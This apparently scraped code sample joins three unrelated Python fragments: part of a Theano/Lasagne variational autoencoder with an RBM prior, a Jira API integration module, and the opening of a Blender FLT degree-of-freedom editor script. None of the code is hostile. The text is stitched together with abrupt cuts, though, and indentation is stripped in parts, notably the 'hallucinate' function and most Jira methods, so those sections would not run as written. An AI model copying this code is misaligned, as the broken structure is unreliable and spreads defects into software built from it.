            l_px_hid, num_units=n_out,
            nonlinearity=relu_shift,
        )
    # create p(a|z)
    l_pa_hid = lasagne.layers.DenseLayer(
        l_px_in, num_units=n_hid,
        nonlinearity=hid_nl,
    )
    l_pa_mu = lasagne.layers.DenseLayer(
        l_pa_hid, num_units=n_aux,
        nonlinearity=None,
    )
    l_pa_logsigma = lasagne.layers.DenseLayer(
        l_pa_hid, num_units=n_aux,
        W=lasagne.init.GlorotNormal(),
        b=lasagne.init.Normal(1e-3),
        nonlinearity=relu_shift,
    )
    # create control variate (baseline) network: scalar baseline b(x)
    l_cv_in = lasagne.layers.InputLayer(
        shape=(None, n_chan, n_dim, n_dim),
        input_var=X,
    )
    l_cv_hid = lasagne.layers.DenseLayer(
        l_cv_in, num_units=n_hid_cv,
        nonlinearity=hid_nl,
    )
    l_cv = lasagne.layers.DenseLayer(
        l_cv_hid, num_units=1,
        nonlinearity=None,
    )
    # create variables for centering signal: running mean (c) and
    # variance (v) of the learning signal, updated in create_updates
    c = theano.shared(np.zeros((1,1), dtype=np.float64), broadcastable=(True,True))
    v = theano.shared(np.zeros((1,1), dtype=np.float64), broadcastable=(True,True))
    # store certain input layers for downstream (quick hack)
    self.input_layers = (l_qa_in, l_qz_in, l_px_in, l_cv_in)
    self.n_lat = n_lat
    self.n_lat2 = int(np.sqrt(n_lat))
    self.n_hid = n_hid
    return l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma, \
        l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma, \
        l_qa, l_qz, l_cv, c, v
def _create_components(self, deterministic=False):
    """Assemble the symbolic log-probability terms of the ELBO.

    When deterministic is False, also caches the individual terms
    (self.log_pxz, self.log_qz_given_x, ...) for use by
    create_gradients/create_updates.

    Returns:
        (log_pxz, log_qza_given_x): per-sample generative joint
        log-probability and variational-posterior log-probability,
        one entry per (example, MC sample) pair.
    """
    # load network input
    X = self.inputs[0]
    x = X.flatten(2)
    # duplicate entries to take into account multiple mc samples:
    # (batch, n_out) -> (batch * n_sam, n_out)
    n_sam = self.n_sample
    n_out = x.shape[1]
    x = x.dimshuffle(0,'x',1).repeat(n_sam, axis=1).reshape((-1, n_out))
    # load networks (control-variate layer and c, v are unused here)
    l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma, \
        l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma, l_qa, l_qz, _, _, _ = self.network
    l_qa_in, l_qz_in, l_px_in, l_cv_in = self.input_layers
    # load network output
    qa_mu, qa_logsigma, a = lasagne.layers.get_output(
        [l_qa_mu, l_qa_logsigma, l_qa],
        deterministic=deterministic,
    )
    qz_mu, z = lasagne.layers.get_output(
        [l_qz_mu, l_qz],
        {l_qz_in: a, l_qa_in: X},
        deterministic=deterministic,
    )
    pa_mu, pa_logsigma = lasagne.layers.get_output(
        [l_pa_mu, l_pa_logsigma], {l_px_in: z},
        deterministic=deterministic,
    )
    if self.model == 'bernoulli':
        px_mu = lasagne.layers.get_output(
            l_px_mu, {l_px_in: z}, deterministic=deterministic)
    elif self.model == 'gaussian':
        px_mu, px_logsigma = lasagne.layers.get_output(
            [l_px_mu, l_px_logsigma], {l_px_in: z},
            deterministic=deterministic,
        )
    # entropy term: log q(z,a|x)
    log_qa_given_x = log_normal2(a, qa_mu, qa_logsigma).sum(axis=1)
    log_qz_given_x = log_bernoulli(z, qz_mu).sum(axis=1)
    # same quantity with z disconnected from the gradient — needed by the
    # score-function estimator in create_gradients
    log_qz_given_x_dgz = log_bernoulli(dg(z), qz_mu).sum(axis=1)
    log_qza_given_x = log_qz_given_x + log_qa_given_x
    # log-probability term
    z_prior = T.ones_like(z)*np.float32(0.5)
    log_pz = log_bernoulli(z, z_prior).sum(axis=1)
    # negative free energy of z under the RBM prior
    # NOTE(review): the reshape hard-codes a minibatch of 128 examples
    # (times n_sample); confirm against the training batch size.
    log_e = -self.rbm.free_energy(z.reshape((128*n_sam,self.n_lat)))
    log_px_given_z = log_bernoulli(x, px_mu).sum(axis=1)
    log_pa_given_z = log_normal2(a, pa_mu, pa_logsigma).sum(axis=1)
    log_pxz = log_pa_given_z + log_px_given_z + log_e
    # save them for later
    if deterministic == False:
        self.log_pxz = log_pxz
        self.log_px_given_z = log_px_given_z
        self.log_pz = log_pz
        self.log_qza_given_x = log_qza_given_x
        self.log_qa_given_x = log_qa_given_x
        self.log_qz_given_x = log_qz_given_x
        self.log_qz_given_x_dgz = log_qz_given_x_dgz
        self.log_e = log_e.mean()
        self.z = z
    # return log_paxz, log_qza_given_x
    return log_pxz, log_qza_given_x
def create_objectives(self, deterministic=False):
    """Return (-ELBO, mean log q(a|x)).

    The second value takes the place of an accuracy metric, which this
    model does not currently track.
    """
    log_joint, log_posterior = self._create_components(deterministic=deterministic)
    negative_elbo = -T.mean(log_joint - log_posterior)
    return negative_elbo, T.mean(self.log_qa_given_x)
def create_gradients(self, loss, deterministic=False):
    """Build gradients for all four parameter groups.

    Returns the clipped gradients concatenated in the order: decoder
    params, q(a|x) params, q(z|a,x) params, control-variate params —
    matching the parameter order returned by get_params.
    """
    # load networks
    l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma, \
        l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma, l_qa, l_qz, l_cv, c, v = self.network
    # load params
    p_params = lasagne.layers.get_all_params(
        [l_px_mu, l_pa_mu, l_pa_logsigma], trainable=True)
    qa_params = lasagne.layers.get_all_params(l_qa_mu, trainable=True)
    qz_params = lasagne.layers.get_all_params(l_qz, trainable=True)
    cv_params = lasagne.layers.get_all_params(l_cv, trainable=True)
    # load neural net outputs (probabilities have been precomputed)
    log_pxz, log_px_given_z, log_pz = self.log_pxz, self.log_px_given_z, self.log_pz
    log_qza_given_x = self.log_qza_given_x
    log_qz_given_x = self.log_qz_given_x
    log_qz_given_x_dgz = self.log_qz_given_x_dgz
    cv = T.addbroadcast(lasagne.layers.get_output(l_cv),1)
    # compute learning signals
    l0 = log_px_given_z + log_pz - log_qz_given_x - cv # NOTE: this didn't have q(a)
    l_avg, l_var = l0.mean(), l0.var()
    # exponential moving averages of the signal's mean and variance,
    # used to center and scale the signal (the matching shared-variable
    # updates live in create_updates)
    c_new = 0.8*c + 0.2*l_avg
    v_new = 0.8*v + 0.2*l_var
    # NOTE(review): l and l_target are identical expressions; only
    # l_target is used below.
    l = (l0 - c_new) / T.maximum(1, T.sqrt(v_new))
    l_target = (l0 - c_new) / T.maximum(1, T.sqrt(v_new))
    # compute grad wrt p
    p_grads = T.grad(-log_pxz.mean(), p_params)
    # compute grad wrt q_a (differentiating through the Gaussian sample)
    elbo = T.mean(log_pxz - log_qza_given_x)
    qa_grads = T.grad(-elbo, qa_params)
    # compute grad wrt q_z: score-function estimator with the centered,
    # scaled signal held constant via disconnected_grad
    qz_target = T.mean(dg(l_target) * log_qz_given_x_dgz)
    qz_grads = T.grad(-0.2*qz_target, qz_params) # 5x slower rate for q
    # compute grad of cv net, trained to minimize the squared signal
    cv_target = T.mean(l0**2)
    cv_grads = [0.2*g for g in T.grad(cv_target, cv_params)]
    # combine and clip gradients
    clip_grad = 1
    max_norm = 5
    grads = p_grads + qa_grads + qz_grads + cv_grads
    mgrads = lasagne.updates.total_norm_constraint(grads, max_norm=max_norm)
    cgrads = [T.clip(g, -clip_grad, clip_grad) for g in mgrads]
    return cgrads
def gen_samples(self, deterministic=False):
    """Decode the sample input S (last model input) through p(x|z),
    returning the symbolic pixel means."""
    sample_input = self.inputs[-1]
    # feed the samples into the decoder input layer
    l_px_in = self.input_layers[2]
    l_px_mu = self.network[0]
    return lasagne.layers.get_output(l_px_mu, {l_px_in: sample_input})
def get_params(self):
    """Return all trainable parameters, concatenated in the same group
    order used by create_gradients: decoder, q(a|x), q(z|a,x),
    control-variate network."""
    (l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma,
     l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma,
     l_qa, l_qz, l_cv, c, v) = self.network
    if self.model == 'gaussian':
        raise NotImplementedError('The code below needs to implement Gaussians')
    decoder_params = lasagne.layers.get_all_params(
        [l_px_mu, l_pa_mu, l_pa_logsigma], trainable=True)
    aux_encoder_params = lasagne.layers.get_all_params(l_qa_mu, trainable=True)
    latent_encoder_params = lasagne.layers.get_all_params(l_qz, trainable=True)
    baseline_params = lasagne.layers.get_all_params(l_cv, trainable=True)
    return decoder_params + aux_encoder_params + latent_encoder_params + baseline_params
def create_updates(self, grads, params, alpha, opt_alg, opt_params):
    """Create the optimizer updates plus the moving-average updates for
    the control-variate centering variables (c, v).

    Args:
        grads: gradient expressions from create_gradients.
        params: matching parameter list from get_params.
        alpha: symbolic learning-rate scale.
        opt_alg: optimizer name handled by the Model base class.
        opt_params: optimizer hyper-parameters.

    Returns:
        OrderedDict containing both the parameter updates and the
        centering-signal updates, suitable for theano.function(updates=...).
    """
    # call super-class to generate SGD/ADAM updates
    grad_updates = Model.create_updates(self, grads, params, alpha, opt_alg, opt_params)
    # load networks, to reach the control-variate layer and the shared
    # centering variables c (mean) and v (variance)
    l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma, \
        l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma, l_qa, l_qz, l_cv, c, v = self.network
    # load neural net outputs (probabilities have been precomputed)
    log_pxz, log_px_given_z, log_pz = self.log_pxz, self.log_px_given_z, self.log_pz
    log_qz_given_x = self.log_qz_given_x
    cv = T.addbroadcast(lasagne.layers.get_output(l_cv),1)
    # compute learning signals (same expression as in create_gradients)
    l = log_px_given_z + log_pz - log_qz_given_x - cv
    l_avg, l_var = l.mean(), l.var()
    c_new = 0.8*c + 0.2*l_avg
    v_new = 0.8*v + 0.2*l_var
    # compute update for centering signal
    cv_updates = {c: c_new, v: v_new}
    # BUG FIX: wrap .items() in list() — on Python 3, dict.items() returns
    # view objects that do not support '+', so the original Python-2-only
    # concatenation raised TypeError.
    return OrderedDict(list(grad_updates.items()) + list(cv_updates.items()))
def hallucinate(self):
"""Generate new samples by passing noise into the decoder"""
# load network params
size, n_lat, n_dim = 100, self.n_lat, self.n_dim
img_size = int(np.sqrt(size))
# # generate noisy inputs
# noise = self.gen_noise(size, n_lat).astype('float32')
# sample noise from RBM
noise = self.rbm.sample()
p_mu = self.dream(noise)
if p_mu is None:
return None
p_mu = p_mu.reshape((img_size, img_size, n_dim, n_dim))
# split into img_size (1,img_size,n_dim,n_dim) | |
<filename>flow/projecttracking/jira/jira.py
import base64
import json
import os
import re
import requests
from flow.buildconfig import BuildConfig
from flow.projecttracking.project_tracking_abc import Project_Tracking
import flow.utils.commons as commons
from flow.utils.commons import Object
#https://<site-url>/rest/api/3/<resource-name>
class Jira(Project_Tracking):
clazz = 'Jira'
token = None
user = None
project_keys = None
jira_url = None
jira_basic_auth = None
config = BuildConfig
http_timeout = 30
    def __init__(self, config_override=None):
        """Initialize the Jira integration from environment and config.

        Reads JIRA_USER / JIRA_TOKEN from the environment, resolves the Jira
        site URL (buildConfig first, settings.ini second), builds the basic
        auth header, and resolves the configured project key(s) to
        (id, key) tuples via the REST API. Exits the process on any
        missing/invalid configuration.

        Args:
            config_override: optional BuildConfig replacement (used in tests).
        """
        method = '__init__'
        commons.print_msg(Jira.clazz, method, 'begin')
        if config_override is not None:
            self.config = config_override
        Jira.token = os.getenv('JIRA_TOKEN')
        Jira.user = os.getenv('JIRA_USER')
        # both credentials are required; report exactly which one is missing
        if not Jira.token:
            if not Jira.user:
                commons.print_msg(Jira.clazz, method, 'No jira user, jira token found in environment. Did you define '
                                  'environment variables \'JIRA_USER\' and \'JIRA_TOKEN\'?', 'ERROR')
            else:
                commons.print_msg(Jira.clazz, method, 'No jira token found in environment. Did you define '
                                  'environment variable \'JIRA_TOKEN\'?', 'ERROR')
            exit(1)
        elif not Jira.user:
            commons.print_msg(Jira.clazz, method, 'No jira user found in environment. Did you define '
                              'environment variable \'JIRA_USER\'?', 'ERROR')
            exit(1)
        # Check for jira url first in buildConfig, second try settings.ini
        try:
            jira_json_config = self.config.json_config['projectTracking']['jira']
            commons.print_msg(Jira.clazz, method, jira_json_config)
            # noinspection PyUnboundLocalVariable
            Jira.jira_url = jira_json_config['url']
        except KeyError as e:
            # only the 'url' key may fall back to settings.ini; any other
            # missing key means the projectTracking config itself is broken
            if e.args[0] == 'url':
                if self.config.settings.has_section('jira') and self.config.settings.has_option('jira', 'url'):
                    Jira.jira_url = self.config.settings.get('jira', 'url')
                else:
                    commons.print_msg(Jira.clazz, method, 'No jira url found in buildConfig or settings.ini.',
                                      'ERROR')
                    exit(1)
            else:
                commons.print_msg(Jira.clazz,
                                  method,
                                  "The build config associated with projectTracking is missing key {}".format(str(e)),
                                  'ERROR')
                exit(1)
        Jira.jira_basic_auth = base64.b64encode("{0}:{1}".format(Jira.user, Jira.token).encode('ascii')).decode('ascii')
        try:
            # since api call to get project data uses key or id just always call to fetch id.
            # 'projectKey' and 'projectKeys' are mutually exclusive in the build config
            if jira_json_config.get('projectKey') is not None and jira_json_config.get('projectKeys') is not None:
                raise KeyError('projectKeys')
            elif jira_json_config.get('projectKey') is not None:
                project_data = self._retrieve_project_info(str(jira_json_config['projectKey']))
                Jira.project_keys = [(project_data['id'], project_data['key'])]
            elif jira_json_config.get('projectKeys') is not None:
                Jira.project_keys = []
                for project_key in jira_json_config.get('projectKeys'):
                    project_data = self._retrieve_project_info(str(project_key))
                    Jira.project_keys.append((project_data['id'], project_data['key']))
            else:
                raise KeyError('projectKey')
            commons.print_msg(Jira.clazz, method, Jira.project_keys)
        except KeyError as e:
            if e.args[0] == 'projectKeys':
                commons.print_msg(Jira.clazz,
                                  method,
                                  "The build config may only contain 'projectKey' for single project key"
                                  " or 'projectKeys' containing an array of project keys",
                                  'ERROR')
            else:
                commons.print_msg(Jira.clazz,
                                  method,
                                  "The build config associated with projectTracking is missing key {}".format(str(e)),
                                  'ERROR')
            exit(1)
        commons.print_msg(Jira.clazz, method, 'end')
def get_details_for_all_stories(self, story_list):
method = 'get_details_for_all_stories'
commons.print_msg(Jira.clazz, method, 'begin')
story_details = []
commons.print_msg(Jira.clazz, method, story_list)
for i, story_id in enumerate(story_list):
story_detail = self._retrieve_story_detail(story_id)
if story_detail is not None:
story_details.append(story_detail)
commons.print_msg(Jira.clazz, method, story_details)
commons.print_msg(Jira.clazz, method, 'end')
return story_details
def _retrieve_project_info(self, project_id):
method = '_retrieve_project_info'
commons.print_msg(Jira.clazz, method, 'begin')
json_data = None
resp = None
project_detail = {'url': '{0}/rest/api/3/project/{1}'.format(Jira.jira_url, project_id)}
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
try:
commons.print_msg(Jira.clazz, method, project_detail['url'])
resp = requests.get(project_detail['url'], headers=headers, timeout=self.http_timeout)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, "Failed retrieving project detail from call to {}".format(
project_detail.get('url', '')), 'ERROR')
commons.print_msg(Jira.clazz, method, e, 'ERROR')
exit(1)
if resp.status_code == 200:
json_data = json.loads(resp.text)
commons.print_msg(Jira.clazz, method, "Project Key: {key}, Project Id: {id}".format(key=json_data['key'],
id=json_data['id']))
else:
commons.print_msg(Jira.clazz, method, "Failed retrieving project detail from call to {url}. \r\n "
"Response: {response}".format(url=project_detail.get('url', ''),
response=resp.text), 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
return json_data
def _retrieve_story_detail(self, story_id):
method = '_retrieve_story_detail'
commons.print_msg(Jira.clazz, method, 'begin')
json_data = None
resp = None
story_detail = {'url': '{0}/rest/api/3/issue/{1}'.format(Jira.jira_url, story_id)}
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
try:
commons.print_msg(Jira.clazz, method, story_detail['url'])
resp = requests.get(story_detail['url'], headers=headers, timeout=self.http_timeout)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, "Failed retrieving story detail from call to {}".format(
story_detail.get('url', '')), 'ERROR')
commons.print_msg(Jira.clazz, method, e, 'ERROR')
exit(1)
if resp.status_code == 200:
json_data = json.loads(resp.text)
commons.print_msg(Jira.clazz, method, json_data)
else:
commons.print_msg(Jira.clazz, method, "Failed retrieving story detail from call to {url}. \r\n "
"Response: {response}".format(url=story_detail.get('url', ''),
response=resp.text), 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
return json_data
def tag_stories_in_commit(self, story_list):
method = 'tag_stories_in_commit'
commons.print_msg(Jira.clazz, method, 'begin')
version = '{0}-{1}'.format(self.config.project_name, self.config.version_number)
self._add_version_to_project(version)
for story in story_list:
self._add_version_to_story(story, version)
commons.print_msg(Jira.clazz, method, 'end')
def _add_version_to_project(self, version):
method = '_add_version_to_project'
commons.print_msg(Jira.clazz, method, 'begin')
for idx, project_id in enumerate(self.project_keys):
does_version_exist = self._determine_if_project_version_exists(project_id[0], version.lower())
if does_version_exist:
commons.print_msg(Jira.clazz, method, 'Version {version} already exists for project {project}, skipping.'.format(version=version.lower(), project=project_id[1]))
else:
version_to_post = Object()
version_to_post.projectId = project_id[0]
version_to_post.name = version.lower()
jira_url = "{url}/rest/api/3/version".format(url=Jira.jira_url)
headers = {'Content-type': 'application/json', 'Accept': 'application/json',
'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
commons.print_msg(Jira.clazz, method, 'Post body for create project version:\n{}'.format(version_to_post.to_JSON()))
try:
resp = requests.post(jira_url, version_to_post.to_JSON(), headers=headers, timeout=self.http_timeout)
if resp.status_code != 201:
commons.print_msg(Jira.clazz, method, "Unable to create version {version} for project {project} \r\n "
"Response: {response}".format(version=version, project=project_id[1], response=resp.text), 'WARN')
else:
commons.print_msg(Jira.clazz, method, resp.text)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, 'Connection error. ' + str(e), 'WARN')
except Exception as e:
commons.print_msg(Jira.clazz, method, "Unable to create version {version} for project {project}".format(
version=version, project=project_id[1]), 'WARN')
commons.print_msg(Jira.clazz, method, e, 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
def _determine_if_project_version_exists(self, project_id, version):
method = '_determine_if_project_version_exists'
commons.print_msg(Jira.clazz, method, 'begin')
jira_url = "{url}/rest/api/3/project/{project}/versions".format(url=Jira.jira_url, project=project_id)
headers = {'Content-type': 'application/json', 'Accept': 'application/json',
'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
version_exists = False
try:
resp = requests.get(jira_url, headers=headers, timeout=self.http_timeout)
if resp.status_code != 200:
commons.print_msg(Jira.clazz, method, "Unable to fetch versions for project {project} \r\n "
"Response: {response}".format(project=project_id, response=resp.text), 'WARN')
return False
else:
project_versions = json.loads(resp.text)
version_exists = any(v['name'] == version for v in project_versions)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, 'Connection error. ' + str(e), 'WARN')
except Exception as e:
commons.print_msg(Jira.clazz, method, "Unable to fetch versions for project {project} \r\n "
"Response: {response}".format(project=project_id, response=resp.text), 'WARN')
commons.print_msg(Jira.clazz, method, e, 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
return version_exists
def _add_version_to_story(self, story_id, version):
method = '_add_version_to_story'
commons.print_msg(Jira.clazz, method, 'begin')
jira_url = "{url}/rest/api/3/issue/{id}".format(url = Jira.jira_url, id = story_id)
headers = {'Content-type': 'application/json', 'Accept': 'application/json',
'Authorization': 'Basic {0}'.format(Jira.jira_basic_auth)}
data = {
"update": {
"fixVersions": [
{
"add": {
"name": version.lower()
}
}
]
}
}
put_data = json.dumps(data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
commons.print_msg(Jira.clazz, method, jira_url)
try:
resp = requests.put(jira_url, put_data, headers=headers, timeout=self.http_timeout)
if resp.status_code != 204:
commons.print_msg(Jira.clazz, method, "Unable to add version {version} to issue {story} \r\n "
"Response: {response}".format(version=version, story=story_id, response=resp.text), 'WARN')
else:
commons.print_msg(Jira.clazz, method, resp.text)
except requests.ConnectionError as e:
commons.print_msg(Jira.clazz, method, 'Connection error. ' + str(e), 'WARN')
except Exception as e:
commons.print_msg(Jira.clazz, method, "Unable to add version {version} for story {story}".format(
version=version, story=story_id), 'WARN')
commons.print_msg(Jira.clazz, method, e, 'WARN')
commons.print_msg(Jira.clazz, method, 'end')
def determine_semantic_version_bump(self, story_details):
method = 'determine_semantic_version_bump'
commons.print_msg(Jira.clazz, method, 'begin')
bump_type = None
for i, story in enumerate(story_details):
#jira labels are global across all projects but could still be used
for j, label in enumerate(story.get('fields').get('labels')):
if label.lower() == 'major':
return 'major'
#jira components behave closest to tracker labels, are per project
for k, component in enumerate(story.get('fields').get('components')):
if component.get('name') == 'major':
return 'major'
story_type = story.get('fields').get('issuetype').get('name').lower()
if story_type == 'story' or story_type == 'chore' or story_type == 'release':
bump_type = 'minor'
elif story_type == 'bug' and bump_type is None:
bump_type = 'bug'
# This fall-through rule is needed because if there are no tracker
# stories present in the commits, we need to default to something,
# else calculate_next_semver will throw an error about getting 'None'
if bump_type is None:
bump_type = 'minor'
commons.print_msg(Jira.clazz, method, "bump type: {}".format(bump_type))
commons.print_msg(Jira.clazz, method, 'end')
return bump_type
def extract_story_id_from_commit_messages(self, commit_messages):
method = 'extract_story_id_from_commit_messages'
commons.print_msg(Jira.clazz, method, 'begin')
story_list = []
for commit_string in commit_messages:
# check if there is a starting bracket and if there are balanced brackets
if commit_string.count('[') > 0 and commit_string.count('[') == commit_string.count(']'):
# for each starting bracket
for m in re.finditer('\[', commit_string):
# find the next subsequent ending bracket
ending_bracket = commit_string.find(']', m.start())
# find the contents between the brackets
stories = commit_string[m.start()+1:ending_bracket]
# verify there isn't a embedded bracket, if so just skip this one and keep marching.
if stories.find('[') == -1: # there is a nested starting bracket
# now dig out the tracker number or jira key in single number format or multiple separated by commas.
r = re.compile('(?:[a-zA-Z]+\-[0-9]+,?)+(,([a-zA-Z]+\-[0-9]+,?))*,?')
stories_array = stories.split(',')
stories = list(filter(r.match, stories_array))
for story in stories:
# split out by comma.
if story not in story_list:
story_list.append(story)
commons.print_msg(Jira.clazz, method, "Story list: {}".format(story_list))
commons.print_msg(Jira.clazz, method, 'end')
return story_list
"""
This methods needs to return an array of stories with 4 specific fields for each story:
story_type
id
name
description
url
current_state
"""
def flatten_story_details(self, story_details):
method = 'flatten_story_details'
commons.print_msg(Jira.clazz, method, 'begin')
if story_details is None:
return None
story_release_notes = []
for story in story_details:
story_release_note_summary = {}
story_release_note_summary['story_type'] = story.get('fields').get('issuetype').get('name').lower()
story_release_note_summary['id'] | |
#!BPY
"""
Name: 'FLT DOF Editor'
Blender: 240
Group: 'Misc'
Tooltip: 'Degree of Freedom editor for FLT nodes'
"""
__author__ = "<NAME>"
__version__ = "1.0 11/21/07"
__email__ = ('scripts', 'Author, ')
__url__ = ('blender', 'blenderartists.org')
__bpydoc__ ="""\
This script provides tools for working with OpenFlight databases in Blender. OpenFlight is a
registered trademark of MultiGen-Paradigm, Inc.
Feature overview and more available at:
http://wiki.blender.org/index.php/Scripts/Manual/FLTools
"""
# --------------------------------------------------------------------------
# flt_palettemanager.py version 0.1 2005/04/08
# --------------------------------------------------------------------------
# ***** BEGIN GPL LICENSE BLOCK *****
#
# Copyright (C) 2007: Blender Foundation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
import struct

import Blender
import Blender.Draw as Draw
from Blender.BGL import *

import flt_properties
reload(flt_properties)
from flt_properties import *
# Event codes for every UI widget in the editor; values are arbitrary but
# unique, and are dispatched on in but_event().
evcode = {
	"DOF_MAKE" : 100,
	"DOF_UPDATE" : 138,
	"DOF_DELETE" : 101,
	"DOF_TRANSX" : 102,
	"DOF_TRANSY" : 103,
	"DOF_TRANSZ" : 104,
	"DOF_ROTX" : 105,
	"DOF_ROTY" : 106,
	"DOF_ROTZ" : 107,
	"DOF_SCALEX" : 108,
	"DOF_SCALEY" : 109,
	"DOF_SCALEZ" : 110,
	"DOF_MIN_TRANSX" : 111,
	"DOF_MIN_TRANSY" : 112,
	"DOF_MIN_TRANSZ" : 113,
	"DOF_MIN_ROTX" : 114,
	"DOF_MIN_ROTY" : 115,
	"DOF_MIN_ROTZ" : 116,
	"DOF_MIN_SCALEX" : 117,
	"DOF_MIN_SCALEY" : 118,
	"DOF_MIN_SCALEZ" : 119,
	"DOF_MAX_TRANSX" : 120,
	"DOF_MAX_TRANSY" : 121,
	"DOF_MAX_TRANSZ" : 122,
	"DOF_MAX_ROTX" : 123,
	"DOF_MAX_ROTY" : 124,
	"DOF_MAX_ROTZ" : 125,
	"DOF_MAX_SCALEX" : 126,
	"DOF_MAX_SCALEY" : 127,
	"DOF_MAX_SCALEZ" : 128,
	"DOF_STEP_TRANSX" : 129,
	"DOF_STEP_TRANSY" : 130,
	"DOF_STEP_TRANSZ" : 131,
	"DOF_STEP_ROTX" : 132,
	"DOF_STEP_ROTY" : 133,
	"DOF_STEP_ROTZ" : 134,
	"DOF_STEP_SCALEX" : 135,
	"DOF_STEP_SCALEY" : 136,
	"DOF_STEP_SCALEZ" : 137
}
# Module-level handles for the Draw widgets, filled in by draw_propsheet().
#system
DOF_MAKE = None
DOF_UPDATE = None
DOF_DELETE = None
#toggle buttons
DOF_TRANSX = None
DOF_TRANSY = None
DOF_TRANSZ = None
DOF_ROTX = None
DOF_ROTY = None
DOF_ROTZ = None
DOF_SCALEX = None
DOF_SCALEY = None
DOF_SCALEZ = None
#Minimums
DOF_MIN_TRANSX = None
DOF_MIN_TRANSY = None
DOF_MIN_TRANSZ = None
DOF_MIN_ROTX = None
DOF_MIN_ROTY = None
DOF_MIN_ROTZ = None
DOF_MIN_SCALEX = None
DOF_MIN_SCALEY = None
DOF_MIN_SCALEZ = None
#maximums
DOF_MAX_TRANSX = None
DOF_MAX_TRANSY = None
DOF_MAX_TRANSZ = None
DOF_MAX_ROTX = None
DOF_MAX_ROTY = None
DOF_MAX_ROTZ = None
DOF_MAX_SCALEX = None
DOF_MAX_SCALEY = None
DOF_MAX_SCALEZ = None
#step
DOF_STEP_TRANSX = None
DOF_STEP_TRANSY = None
DOF_STEP_TRANSZ = None
DOF_STEP_ROTX = None
DOF_STEP_ROTY = None
DOF_STEP_ROTZ = None
DOF_STEP_SCALEX = None
DOF_STEP_SCALEY = None
DOF_STEP_SCALEZ = None
#labels
DOF_ROTSTRING = None
DOF_TRANSTRING = None
DOF_SCALESTRING = None
DOF_EDITLABEL = None
# Aliases for the FLT DOF record's ID-property keys, to make them easier to
# read (the raw keys encode field index and type, e.g. '14d!ZMIN').
zmin = '14d!ZMIN'
zmax = '15d!ZMAX'
zcur = '16d!ZCUR'
zstep = '17d!ZSTEP'
ymin = '18d!YMIN'
ymax = '19d!YMAX'
ycur = '20d!YCUR'
ystep = '21d!YSTEP'
xmin = '22d!XMIN'
xmax = '23d!XMAX'
xcur = '24d!XCUR'
xstep = '25d!XSTEP'
pitchmin = '26d!PITCH-MIN'
pitchmax = '27d!PITCH-MAX'
pitchcur = '28d!PITCH-CUR'
pitchstep = '29d!PITCH-STEP'
rollmin = '30d!ROLL-MIN'
rollmax = '31d!ROLL-MAX'
rollcur = '32d!ROLL-CUR'
rollstep = '33d!ROLL-STEP'
yawmin = '34d!YAW-MIN'
yawmax = '35d!YAW-MAX'
yawcur = '36d!YAW-CUR'
yawstep = '37d!YAW-STEP'
zscalemin = '38d!ZSIZE-MIN'
zscalemax = '39d!ZSIZE-MAX'
zscalecur = '40d!ZSIZE-CUR'
zscalestep = '41d!ZSIZE-STEP'
yscalemin = '42d!YSIZE-MIN'
yscalemax = '43d!YSIZE-MAX'
yscalecur = '44d!YSIZE-CUR'
yscalestep = '45d!YSIZE-STEP'
xscalemin = '46d!XSIZE-MIN'
xscalemax = '47d!XSIZE-MAX'
xscalecur = '48d!XSIZE-CUR'
xscalestep = '49d!XSIZE-STEP'
def update_state():
	"""Snapshot the current Blender editing context.

	Returns a dict with keys activeScene, activeObject (None when the
	active object is deselected), activeMesh, activeFace and editmode.
	"""
	state = dict()
	state["activeScene"] = Blender.Scene.GetCurrent()
	state["activeObject"] = state["activeScene"].objects.active
	# an active-but-deselected object is treated as no active object
	if state["activeObject"] and not state["activeObject"].sel:
		state["activeObject"] = None
	state["activeMesh"] = None
	if state["activeObject"] and state["activeObject"].type == 'Mesh':
		state["activeMesh"] = state["activeObject"].getData(mesh=True)
	state["activeFace"] = None
	if state["activeMesh"]:
		# activeFace index is only meaningful when the mesh has face UVs
		# (fix: identity comparison with None instead of '!= None')
		if state["activeMesh"].faceUV and state["activeMesh"].activeFace is not None:
			state["activeFace"] = state["activeMesh"].faces[state["activeMesh"].activeFace]
	#update editmode
	state["editmode"] = Blender.Window.EditMode()
	return state
def idprops_append(object, typecode, props):
	# Replace the object's FLT ID-property block with `props` plus the node
	# type code; the FLT id field ('3t8!id') is set to the object's name.
	object.properties["FLT"] = dict()
	object.properties["FLT"]['type'] = typecode
	for prop in props:
		object.properties["FLT"][prop] = props[prop]
	object.properties["FLT"]['3t8!id'] = object.name
def idprops_kill(object=None):
	# Remove the FLT ID-property block from `object`, or — for backward
	# compatibility with the original zero-argument form — from the active
